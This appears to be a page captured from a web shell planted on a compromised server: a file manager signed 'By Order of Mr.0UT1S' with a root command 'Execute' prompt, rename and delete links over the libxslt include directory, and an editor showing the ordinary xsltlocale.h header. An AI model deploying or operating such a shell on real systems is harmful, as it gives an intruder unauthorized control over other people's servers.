usr
/
include
/
libxslt
/
Go to Home Directory
+
Upload
Create File
root@0UT1S:~$
Execute
By Order of Mr.0UT1S
[DIR] ..
N/A
attributes.h
930 bytes
Rename
Delete
documents.h
2.64 KB
Rename
Delete
extensions.h
6.74 KB
Rename
Delete
extra.h
1.60 KB
Rename
Delete
functions.h
1.96 KB
Rename
Delete
imports.h
1.80 KB
Rename
Delete
keys.h
1.13 KB
Rename
Delete
namespaces.h
1.63 KB
Rename
Delete
numbersInternals.h
1.97 KB
Rename
Delete
pattern.h
1.95 KB
Rename
Delete
preproc.h
892 bytes
Rename
Delete
security.h
2.59 KB
Rename
Delete
templates.h
2.21 KB
Rename
Delete
transform.h
6.18 KB
Rename
Delete
variables.h
3.10 KB
Rename
Delete
xslt.h
1.92 KB
Rename
Delete
xsltInternals.h
56.01 KB
Rename
Delete
xsltconfig.h
3.50 KB
Rename
Delete
xsltexports.h
3.35 KB
Rename
Delete
xsltlocale.h
1.51 KB
Rename
Delete
xsltutils.h
8.10 KB
Rename
Delete
/* * Summary: Locale handling * Description: Interfaces for locale handling. Needed for language dependent * sorting. * * Copy: See Copyright for the status of this software. * * Author: Nick Wellnhofer */ #ifndef __XML_XSLTLOCALE_H__ #define __XML_XSLTLOCALE_H__ #include <libxml/xmlstring.h> #include "xsltexports.h" #ifdef HAVE_STRXFRM_L /* * XSLT_LOCALE_POSIX: * Macro indicating to use POSIX locale extensions */ #define XSLT_LOCALE_POSIX #ifdef HAVE_LOCALE_H #include <locale.h> #endif #ifdef HAVE_XLOCALE_H #include <xlocale.h> #endif typedef locale_t xsltLocale; typedef xmlChar xsltLocaleChar; #elif defined(_WIN32) && !defined(__CYGWIN__) /* * XSLT_LOCALE_WINAPI: * Macro indicating to use WinAPI for extended locale support */ #define XSLT_LOCALE_WINAPI #include <windows.h> #include <winnls.h> typedef LCID xsltLocale; typedef wchar_t xsltLocaleChar; #else /* * XSLT_LOCALE_NONE: * Macro indicating that there's no extended locale support */ #define XSLT_LOCALE_NONE typedef void *xsltLocale; typedef xmlChar xsltLocaleChar; #endif XSLTPUBFUN xsltLocale XSLTCALL xsltNewLocale (const xmlChar *langName); XSLTPUBFUN void XSLTCALL xsltFreeLocale (xsltLocale locale); XSLTPUBFUN xsltLocaleChar * XSLTCALL xsltStrxfrm (xsltLocale locale, const xmlChar *string); XSLTPUBFUN int XSLTCALL xsltLocaleStrcmp (xsltLocale locale, const xsltLocaleChar *str1, const xsltLocaleChar *str2); XSLTPUBFUN void XSLTCALL xsltFreeLocales (void); #endif /* __XML_XSLTLOCALE_H__ */
Save